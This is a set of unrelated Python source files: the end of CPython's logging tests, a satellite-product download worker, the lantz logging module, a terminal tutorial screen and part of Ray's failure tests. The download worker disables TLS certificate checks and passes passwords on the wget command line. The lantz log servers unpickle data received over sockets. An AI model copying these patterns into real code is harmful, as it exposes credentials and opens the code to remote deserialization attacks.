self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def test_compute_files_to_delete(self):
# See bpo-46063 for background
wd = tempfile.mkdtemp(prefix='test_logging_')
self.addCleanup(shutil.rmtree, wd)
times = []
dt = datetime.datetime.now()
for i in range(10):
times.append(dt.strftime('%Y-%m-%d_%H-%M-%S'))
dt += datetime.timedelta(seconds=5)
prefixes = ('a.b', 'a.b.c', 'd.e', 'd.e.f')
files = []
rotators = []
for prefix in prefixes:
p = os.path.join(wd, '%s.log' % prefix)
rotator = logging.handlers.TimedRotatingFileHandler(p, when='s',
interval=5,
backupCount=7,
delay=True)
rotators.append(rotator)
if prefix.startswith('a.b'):
for t in times:
files.append('%s.log.%s' % (prefix, t))
else:
rotator.namer = lambda name: name.replace('.log', '') + '.log'
for t in times:
files.append('%s.%s.log' % (prefix, t))
# Create empty files
for fn in files:
p = os.path.join(wd, fn)
with open(p, 'wb') as f:
pass
# Now the checks that only the correct files are offered up for deletion
for i, prefix in enumerate(prefixes):
rotator = rotators[i]
candidates = rotator.getFilesToDelete()
self.assertEqual(len(candidates), 3)
if prefix.startswith('a.b'):
p = '%s.log.' % prefix
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.startswith(p))
else:
for c in candidates:
d, fn = os.path.split(c)
self.assertTrue(fn.endswith('.log'))
self.assertTrue(fn.startswith(prefix + '.') and
fn[len(prefix) + 2].isdigit())
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, encoding="utf-8", when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception as e:
print('exception in diagnostic code: %s' % e, file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
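# Note added for clarity: the loop above generates one test_compute_rollover_<when>
# method per rollover interval and attaches it to TimedRotatingFileHandlerTest via
# setattr(). The when=when, exp=exp default arguments bind the loop variables at
# function-definition time, so each generated test keeps its own interval and
# expected rollover offset.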
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
not_exported = {
'logThreads', 'logMultiprocessing', 'logProcesses', 'currentframe',
'PercentStyle', 'StrFormatStyle', 'StringTemplateStyle',
'Filterer', 'PlaceHolder', 'Manager', 'RootLogger', 'root',
'threading', 'logAsyncioTasks'}
support.check__all__(self, logging, not_exported=not_exported)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
def setUpModule():
unittest.enterModuleContext(support.run_with_locale('LC_ALL', ''))
if __name__ == "__main__":
unittest.main()
|
worker.py
|
import os
import subprocess
import json
import time
from multiprocessing import Lock, Process
from threading import Thread
import logging
import sys
import re
import zipfile
import colorama
from colorama import Fore, Back, Style
from .resumable import Resumable
from .loggable import Loggable
class Worker(Resumable, Loggable):
request_lock = Lock()
log_download_progress_lock = Lock()
worker_instances_list = []
def __init__(self, worker_name, username, password):
Resumable.__init__(self)
Loggable.__init__(self)
self.username = username
self.password = password
self.name = worker_name
self.workdir = None
self.query = None
self.download_location = None
self.polling_interval = None
self.offline_retries = None
self.logger = None
self.return_msg = None
self.download_bar = None
self.colour = ""
Worker.worker_instances_list.append(self)
Worker.assign_colours()
def __del__(self):
try:
Worker.worker_instances_list.remove(self)
except ValueError as e:
pass
@classmethod
def assign_colours(cls):
'''Assign each worker instance a background colour when logging download progress'''
for i in range(0, len(cls.worker_instances_list)):
mode = i % 6
if mode == 0:
cls.worker_instances_list[i].colour = Back.CYAN + Style.BRIGHT
elif mode == 1:
cls.worker_instances_list[i].colour = Back.MAGENTA + Style.BRIGHT
elif mode == 2:
cls.worker_instances_list[i].colour = Back.BLUE + Style.BRIGHT
elif mode == 3:
cls.worker_instances_list[i].colour = Back.GREEN + Style.BRIGHT
elif mode == 4:
cls.worker_instances_list[i].colour = Back.YELLOW + Style.BRIGHT + Fore.RED
elif mode == 5:
cls.worker_instances_list[i].colour = Back.RED + Style.BRIGHT
def setup(self, workdir):
self.workdir = workdir
self.logger = self._setup_logger(self.name, self.workdir)
progress_log_path = os.path.join(self.workdir, self.name + '_progress.txt')
self._setup_progress_log(progress_log_path)
def query_total_results(self, query):
''' Get the total number of products in a search query
Args:
query (str): a query that requests a response in JSON
Returns:
total_results (int): the total number of product results from the query response
'''
json_file = "res.json"
try:
cmd = ["wget", "--no-check-certificate", "--user=" + self.username, "--password=" + self.password, "-O", json_file, query]
subprocess.call(cmd)
res_json = json.load(open(json_file))
total_results = int(res_json["feed"]["opensearch:totalResults"])
if total_results <= 0:
raise ValueError
os.remove(json_file)
return total_results
except Exception as e:
raise
def query_product_uri(self, result_num):
'''
params: result number
returns: title and product_uri, eg. "S1A_IW_GRDH_1SDV_20181011T115601_20181011T115626_024088_02A208_C886", "https://scihub.copernicus.eu/dhus/odata/v1/Products('7bc7da0c-8241-4bbe-8d59-1661667c6161')/$value"
'''
query = self.query + str(result_num)
self.logger.debug(query)
json_file = self.name + "_res.json"
try:
cmd = ["wget", "--no-check-certificate", "--user=" + self.username, "--password=" + self.password, "-O", json_file, query]
subprocess.call(cmd)
res_json = json.load(open(json_file))
title = str(res_json["feed"]["entry"]["title"])
product_uri = str(res_json["feed"]["entry"]["link"][0]["href"])
os.remove(json_file)
return title, product_uri
except Exception as e:
raise
def query_product_uri_with_retries(self, result_number, max_retries=3):
title = None
product_uri = None
uri_query_retries = 0
uri_query_max_retries = max_retries
while uri_query_retries <= uri_query_max_retries and (title is None or product_uri is None):
try:
self._prepare_to_request()
title, product_uri = self.query_product_uri(result_number)
except Exception as e:
self.logger.error(e)
self.logger.error(Fore.RED + "Error in querying product uri from result number.")
self.logger.error("Retrying " + str(uri_query_retries) + " out of " + str(uri_query_max_retries) + " times.")
uri_query_retries += 1
return title, product_uri
def download_product(self, file_path, product_uri):
'''Download a product in a non-blocking wget subprocess
Args:
file_path (str): path to file where downloaded content will be written to, eg ./product.zip
product_uri (str): eg. https://scihub.copernicus.eu/dhus/odata/v1/Products('bc8421bd-2930-48eb-9caf-7b8d23df36eb')/$value
Returns:
proc (subprocess.Popen): a Popen object that is running the download process
'''
try:
cmd = ["wget", "-O", file_path, "--continue", "--user=" + self.username, "--password=" + self.password, product_uri]
proc = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, text=True, universal_newlines=True)
return proc
except Exception as e:
raise
def _log_download_progress(self, proc, title, file_size):
'''Logs the relevant info of a wget download process
Args:
proc (subprocess.Popen): Popen object running wget download process, with stderr piped to stdout
title (str): name of downloaded file
file_size (int): full size of file to be downloaded
'''
while proc.poll() is None:
line = proc.stdout.readline()
if line:
msg = None
try:
response = re.search(r'HTTP request sent, awaiting response... .+', line).group(0)
msg = title + ", " + response
except AttributeError as e:
pass
try:
progress_perc = r'\d+%'
progress_perc = re.search(progress_perc, line).group(0)
time_left = r'(\d+[hms])+'
time_left = re.search(time_left, line).group(0)
downloaded = r'\d+[KM]'
downloaded = re.search(downloaded, line).group(0)
msg = title + ', Progress: ' + progress_perc + ', Downloaded: ' + downloaded + '/' + str(file_size) + ', Time left: ' + time_left
except AttributeError as e:
pass
if msg:
self.log_download_progress_lock.acquire()
self.logger.info(self.colour + msg)
self.log_download_progress_lock.release()
else:
proc.stdout.flush()
def query_product_size(self, product_uri):
''' Query the file size of product
Args:
product uri (str): eg. https://scihub.copernicus.eu/dhus/odata/v1/Products('23759763-91e8-4336-a50a-a143e14c8d69')/$value
Returns:
product file size in bytes (int) or None if product_uri query failed
'''
try:
cmd = ["wget", "--spider", "--user=" + self.username, "--password=" + self.password, product_uri]
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
m = re.search(r'(?<=Length: )\d+', str(out))
length = int(m.group(0))
return length
except Exception as e:
self.logger.error(e)
self.logger.error("Error in querying product size for " + product_uri)
return None
def get_downloaded_product_size(self, file_path):
try:
b = os.path.getsize(file_path)
return int(b)
except Exception as e:
self.logger.error(e)
def _hold_lock(self, request_lock):
self.logger = self._setup_logger(self.name, self.workdir)
self.logger.debug("\n\n" + self.name + " has the lock. Ready to send requests...\n\n")
time.sleep(5)
request_lock.release()
def _prepare_to_request(self):
'''Prepare to send a request by acquiring the request lock.
The holder then has 5 seconds as the only worker sending a request before a background thread releases the lock.
'''
self.request_lock.acquire()
hold_lock_thread = Thread(target=self._hold_lock, args=(self.request_lock,))
hold_lock_thread.start()
def register_settings(self, query, download_location, polling_interval, offline_retries):
self.query = query
self.download_location = download_location
self.polling_interval = polling_interval
self.offline_retries = offline_retries
def _is_bad_zipfile(self, file_path):
try:
with zipfile.ZipFile(file_path) as zf:
zf.close()
return False
except zipfile.BadZipFile as e:
self.logger.error(file_path + " could not be opened.")
return True
except Exception as e:
self.logger.error(e)
def run(self, result_num, uri_query_max_retries=3):
status = None
title, product_uri = self.query_product_uri_with_retries(result_num)
file_path = os.path.join(self.download_location, title + ".zip")
complete_product_size = self.query_product_size(product_uri)
max_attempts = self.offline_retries + 1
for attempt in range(1, self.offline_retries + 2):
self.logger.info("Download attempt number " + str(attempt) + " of " + str(max_attempts))
self._prepare_to_request()
self.logger.info(Fore.GREEN + "Begin downloading\n" + title + "\nat\n" + product_uri + "\n")
proc = self.download_product(file_path, product_uri)
self._log_download_progress(proc, title, complete_product_size)
product_size = self.get_downloaded_product_size(file_path)
if product_size == 0:
self.logger.warning(Fore.YELLOW + "Product could be offline. Retrying after " + str(self.polling_interval) + " seconds.")
status = "OFFLINE"
time.sleep(self.polling_interval)
elif product_size < complete_product_size:
self.logger.warning(Fore.YELLOW + "There was a break in connection.")
status = "FAILED"
else:
if self._is_bad_zipfile(file_path):
self.logger.error("Product download failed.")
status = "FAILED"
else:
self.logger.info(Fore.GREEN + "Downloaded product " + title)
status = "SUCCESS"
break
outcome = self.name + " " + title + " " + status
self.logger.info(outcome)
return outcome
def run_in_seperate_process(self, result_num, ready_worker_queue, request_lock, log_download_progress_lock):
# Set up the logger again because it is shallow-copied into the new process and loses its setup
self.logger = self._setup_logger(self.name, self.workdir)
self.request_lock = request_lock
self.log_download_progress_lock = log_download_progress_lock
self.return_msg = None
self.update_resume_point(result_num)
self.logger.info("running worker" + self.name)
self.return_msg = self.run(result_num)
self._close_all_loggers()
self.request_lock = None
self.log_download_progress_lock = None
ready_worker_queue.put(self)
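# Illustrative usage sketch (not part of the original module; all values below are
# hypothetical). A Worker is configured with setup() and register_settings() before
# run() is called for a given search-result number:
#
#   w = Worker("worker-1", username="user", password="secret")
#   w.setup(workdir="./work")
#   w.register_settings(query="<opensearch query url>&start=",
#                       download_location="./downloads",
#                       polling_interval=600,
#                       offline_retries=2)
#   outcome = w.run(result_num=0)   # e.g. "worker-1 <product title> SUCCESS"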
|
log.py
|
# -*- coding: utf-8 -*-
"""
lantz.core.log
~~~~~~~~~~~~~~
Implements logging support for Lantz.
:copyright: 2018 by The Lantz Authors
:license: BSD, see LICENSE for more details.
"""
import errno
import pickle
import select
import socket
import struct
import logging
import threading
from logging import DEBUG, INFO, WARNING, ERROR, CRITICAL
from logging.handlers import SocketHandler
from logging.handlers import DEFAULT_UDP_LOGGING_PORT
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
from stringparser import Parser
from . import config
class _LogRecord(logging.LogRecord):
def getMessage(self):
"""Return the message for this LogRecord."""
msg = str(self.msg)
if self.args:
if '%s' in msg:
msg = msg % self.args
else:
msg = msg.format(*self.args)
return msg
def _makeRecord(name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
"""A factory method which can be overridden in subclasses to create
specialized LogRecords.
"""
rv = _LogRecord(name, level, fn, lno, msg, args, exc_info, func, sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def get_logger(name, add_NullHandler=True, patch_makeRecord=True):
"""
Parameters
----------
name :
add_NullHandler :
(Default value = True)
patch_makeRecord :
(Default value = True)
Returns
-------
type
if patch_makeRecord, the logger makeRecord will be replaced with a PEP3101 compatible version.
"""
logger = logging.getLogger(name)
if add_NullHandler:
logger.addHandler(logging.NullHandler())
if patch_makeRecord:
logger.makeRecord = _makeRecord
return logger
LOGGER = get_logger('lantz')
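# Minimal illustration (assumed usage, not from the original module): because
# get_logger() patches makeRecord with _LogRecord, both %-style and str.format-style
# message arguments are accepted by the returned logger:
#
#   log = get_logger('lantz.example')          # 'lantz.example' is a made-up name
#   log.warning('%s took %d ms', 'init', 12)   # classic %-formatting
#   log.warning('{} took {} ms', 'init', 12)   # PEP 3101 brace formatting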
class ColorizingFormatter(logging.Formatter):
"""Color capable logging formatter.
Use <color> </color> to enclose text to colorize.
Parameters
----------
Returns
-------
"""
SPLIT_COLOR = Parser('{0:s}<color>{1:s}</color>{2:s}')
SCHEME = {'bw': {logging.DEBUG: '',
logging.INFO: '',
logging.WARNING: '',
logging.ERROR: '',
logging.CRITICAL: ''}
}
@classmethod
def add_color_schemes(cls, style, fore, back):
"""
Parameters
----------
style :
fore :
back :
Returns
-------
"""
cls.format = cls.color_format
cls.SCHEME.update(bright={DEBUG: style.NORMAL,
INFO: style.NORMAL,
WARNING: style.BRIGHT,
ERROR: style.BRIGHT,
CRITICAL: style.BRIGHT},
simple={DEBUG: fore.BLUE + style.BRIGHT,
INFO: back.WHITE + fore.BLACK,
WARNING: fore.YELLOW + style.BRIGHT,
ERROR: fore.RED + style.BRIGHT,
CRITICAL: back.RED + fore.WHITE + style.BRIGHT},
whitebg={DEBUG: fore.BLUE + style.BRIGHT,
INFO: back.WHITE + fore.BLACK,
WARNING: fore.YELLOW + style.BRIGHT,
ERROR: fore.RED + style.BRIGHT,
CRITICAL: back.RED + fore.WHITE + style.BRIGHT},
blackbg={DEBUG: fore.BLUE + style.BRIGHT,
INFO: fore.GREEN,
WARNING: fore.YELLOW + style.BRIGHT,
ERROR: fore.RED + style.BRIGHT,
CRITICAL: back.RED + fore.WHITE + style.BRIGHT}
)
cls.RESET_ALL = style.RESET_ALL
def __init__(self, fmt, datefmt='%H:%M:%S', style='%', scheme='bw'):
super().__init__(fmt, datefmt, style)
self.scheme = scheme
@property
def scheme(self):
""" """
return self._scheme
@scheme.setter
def scheme(self, value):
"""
Parameters
----------
value :
Returns
-------
"""
if isinstance(value, str):
self._scheme = self.SCHEME[value]
else:
self._scheme = value
def colorize(self, message, record):
"""Colorize message based on record level
Parameters
----------
message :
record :
Returns
-------
"""
if record.levelno in self._scheme:
color = self._scheme[record.levelno]
return color + message + self.RESET_ALL
return message
def color_format(self, record):
"""Format record into string, colorizing the text enclosed
within <color></color>
Parameters
----------
record :
Returns
-------
"""
message = super().format(record)
parts = message.split('\n', 1)
if '<color>' in parts[0] and '</color>' in parts[0]:
bef, dur, aft = self.SPLIT_COLOR(parts[0])
parts[0] = bef + self.colorize(dur, record) + aft
message = '\n'.join(parts)
return message
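# Illustrative example (assumed, and only meaningful once add_color_schemes() has
# registered the colorama-based schemes below): text enclosed in <color>...</color>
# in the format string is colorized according to the record level, e.g.
#
#   fmt = ColorizingFormatter('{asctime} <color>{levelname}</color> {message}',
#                             style='{', scheme='blackbg')
#
# Note that only the first line of a multi-line message is scanned for the markers.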
def init_colorama():
""" """
try:
from colorama import Fore, Back, Style, init as colorama_init
colorama_init()
colorama = True
DEFAULT_FMT = Style.NORMAL + '{asctime} <color>{levelname:8s}</color>' + Style.RESET_ALL + ' {message}'
ColorizingFormatter.add_color_schemes(Style, Fore, Back)
except Exception as e:
LOGGER.info('Log will not be colorized. Could not import colorama: {}', e)
colorama = False
DEFAULT_FMT = '{asctime} {levelname:8s} {message}'
return colorama, DEFAULT_FMT
colorama, DEFAULT_FMT = init_colorama()
class BaseServer(object):
"""Mixin for common server functionality"""
allow_reuse_address = True
def __init__(self, handler, timeout):
self._record_handler = handler
self._stop = threading.Event()
self.timeout = timeout
def handle_record(self, record):
"""
Parameters
----------
record :
Returns
-------
"""
self._record_handler(record)
def serve_until_stopped(self):
""" """
while not self._stop.is_set():
rd, wr, ex = self.select()
if rd:
self.handle_request()
self.server_close()
def select(self):
""" """
return select.select([self.socket.fileno()], [], [], self.timeout)
def stop(self):
""" """
self._stop.set()
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It basically logs the record
using whatever logging policy is configured locally.
Parameters
----------
Returns
-------
"""
def handle(self):
"""Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally.
Parameters
----------
Returns
-------
"""
while True:
try:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = _LogRecord(None, None, "", 0, "", (), None, None)
record.__dict__.update(obj)
self.server.handle_record(record)
except socket.error as e:
if not isinstance(e.args, tuple):
raise e
else:
if e.args[0] != errno.ECONNRESET:
raise e
break
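# Wire-format sketch (for illustration only): each record on the stream is a 4-byte
# big-endian length prefix followed by a pickled dict of LogRecord attributes, which
# matches what logging.handlers.SocketHandler emits. A minimal hand-rolled sender
# could look roughly like:
#
#   payload = pickle.dumps(record.__dict__, 1)
#   sock.sendall(struct.pack(">L", len(payload)) + payload)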
class LoggingTCPServer(ThreadingTCPServer, BaseServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes.
Parameters
----------
Returns
-------
"""
allow_reuse_address = True
def __init__(self, addr, handler, timeout=1):
ThreadingTCPServer.__init__(self, addr, LogRecordStreamHandler)
BaseServer.__init__(self, handler, timeout)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
class LogRecordDatagramHandler(DatagramRequestHandler):
"""Handler for a datagram logging request. It basically logs the record
using whatever logging policy is configured locally.
Parameters
----------
Returns
-------
"""
def handle(self):
""" """
chunk = self.packet
slen = struct.unpack(">L", chunk[:4])[0]
chunk = chunk[4:]
assert len(chunk) == slen
obj = pickle.loads(chunk)
record = _LogRecord(None, None, "", 0, "", (), None, None)
record.__dict__.update(obj)
self.server.handle_record(record)
def finish(self):
""" """
pass
class LoggingUDPServer(ThreadingUDPServer, BaseServer):
"""A simple-minded UDP datagram-based logging receiver suitable for test
purposes.
Parameters
----------
Returns
-------
"""
def __init__(self, addr, handler, timeout=1):
ThreadingUDPServer.__init__(self, addr, LogRecordDatagramHandler)
BaseServer.__init__(self, handler, timeout)
class SocketListener(object):
"""Print incoming log recored to tcp and udp ports."""
def __init__(self, tcphost, udphost):
self.tcp_addr = get_address(tcphost)
self.udp_addr = get_address(udphost, DEFAULT_UDP_LOGGING_PORT)
self.start()
def start(self):
""" """
self._lock = threading.RLock()
s = LoggingTCPServer(self.tcp_addr, self.on_record, 1)
self.tcp_server = s
self.tcp_thread = t = threading.Thread(target=s.serve_until_stopped)
t.daemon = True
t.start()
s = LoggingUDPServer(self.udp_addr, self.on_record, 1)
self.udp_server = s
self.udp_thread = t = threading.Thread(target=s.serve_until_stopped)
t.daemon = True
t.start()
def stop(self):
""" """
self.tcp_server.stop()
self.tcp_thread.join()
self.udp_server.stop()
self.udp_thread.join()
def on_record(self, record):
"""
Parameters
----------
record :
Returns
-------
"""
pass
def log_to_socket(level=logging.INFO, host=config.TCP_LOGGING_HOST,
port=config.TCP_LOGGING_PORT):
"""Log all Lantz events to a socket with a specific host address and port.
Parameters
----------
level :
logging level for the lantz handler (Default value = logging.INFO)
host :
socket host (default config.TCP_LOGGING_HOST)
port :
socket port (default config.TCP_LOGGING_PORT)
Returns
-------
type
lantz logger
"""
handler = SocketHandler(host, port)
handler.setLevel(level)
LOGGER.addHandler(handler)
if LOGGER.getEffectiveLevel() > level:
LOGGER.setLevel(level)
return LOGGER
def log_to_screen(level=logging.INFO, scheme='blackbg'):
"""Log all Lantz events to the screen with a colorized terminal
Parameters
----------
level :
logging level for the lantz handler (Default value = logging.INFO)
scheme :
color scheme. Valid values are 'bw', 'bright', 'simple', 'whitebg', 'blackbg' (Default value = 'blackbg')
Returns
-------
type
lantz logger
"""
handler = logging.StreamHandler()
handler.setLevel(level)
if not colorama:
scheme = 'bw'
handler.setFormatter(ColorizingFormatter(fmt=DEFAULT_FMT, scheme=scheme, style='{'))
LOGGER.addHandler(handler)
if LOGGER.getEffectiveLevel() > level:
LOGGER.setLevel(level)
return LOGGER
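# Example usage (assumed, not from the original module):
#
#   import logging
#   from lantz.core.log import log_to_screen, log_to_socket, LOGGER
#   log_to_screen(logging.DEBUG, scheme='simple')   # colorized console output
#   log_to_socket(logging.INFO)                     # also forward records to a TCP listener
#   LOGGER.info('Opened {}', 'COM3')                # 'COM3' is a made-up value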
def get_address(value, default_port=config.TCP_LOGGING_PORT):
"""Split host:port string into (host, port) tuple
Parameters
----------
value :
'host:port' string
default_port :
port used if not given (Default value = config.TCP_LOGGING_PORT)
Returns
-------
type
(host, port)
"""
value = value.strip()
if ':' not in value[:-1]:
result = value, default_port
else:
h, p = value.split(':')
result = h, int(p)
return result
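# Examples (illustrative):
#   get_address('127.0.0.1:9020')  ->  ('127.0.0.1', 9020)
#   get_address('127.0.0.1')       ->  ('127.0.0.1', config.TCP_LOGGING_PORT)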
|
tutorial.py
|
from pathlib import Path
from threading import Thread
from typing import List
from playsound import playsound
import boxed
from boxed.border import draw_boundary
def display_tutorial(lines: List[str]) -> None:
"""Wraps and prints tutorial text"""
print(boxed.terminal.clear, end="")
print(
boxed.terminal.move(boxed.terminal.height - 3, boxed.terminal.width - 20)
+ f"Press {boxed.terminal.white_bold}B{boxed.terminal.normal} to go back"
)
draw_boundary()
print(boxed.terminal.move_xy(2, 2), end="")
lines = [
line.format(
title=boxed.terminal.white_underline + boxed.terminal.bold,
bold=boxed.terminal.bold,
normal=boxed.terminal.normal,
breakline=boxed.terminal.white_underline + boxed.terminal.normal,
)
for line in lines
]
for line in lines:
if line.startswith(boxed.terminal.white_underline):
print(boxed.terminal.move_down(1) + boxed.terminal.move_x(2), end="")
for wrapped_line in boxed.terminal.wrap(line, width=boxed.terminal.width - 4):
print(wrapped_line, end="")
print(boxed.terminal.move_down(1) + boxed.terminal.move_x(2), end="", flush=True)
def load_screen(file: Path) -> None:
"""Callback for loading screen"""
tutorial_text = file.read_text(encoding="utf8").splitlines()
terminal_size = 0, 0
with boxed.terminal.hidden_cursor():
with boxed.terminal.cbreak():
while True:
if terminal_size != (boxed.terminal.width, boxed.terminal.height):
display_tutorial(tutorial_text)
terminal_size = (boxed.terminal.width, boxed.terminal.height)
if boxed.terminal.inkey(timeout=0.1) == "b":
Thread(
target=lambda: playsound("music/up-down.wav"), daemon=True
).start()
return
|
test_failure.py
|
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (wait_for_condition, SignalActor, init_error_pubsub,
get_error_message, Semaphore)
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
address_info = ray_start_regular
address = address_info["redis_address"]
redis_client = ray._private.services.create_redis_client(
address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
error_message = "Test error message"
ray.utils.push_error_to_driver_through_redis(
redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
errors = get_error_message(error_pubsub, 1,
ray_constants.DASHBOARD_AGENT_DIED_ERROR)
assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
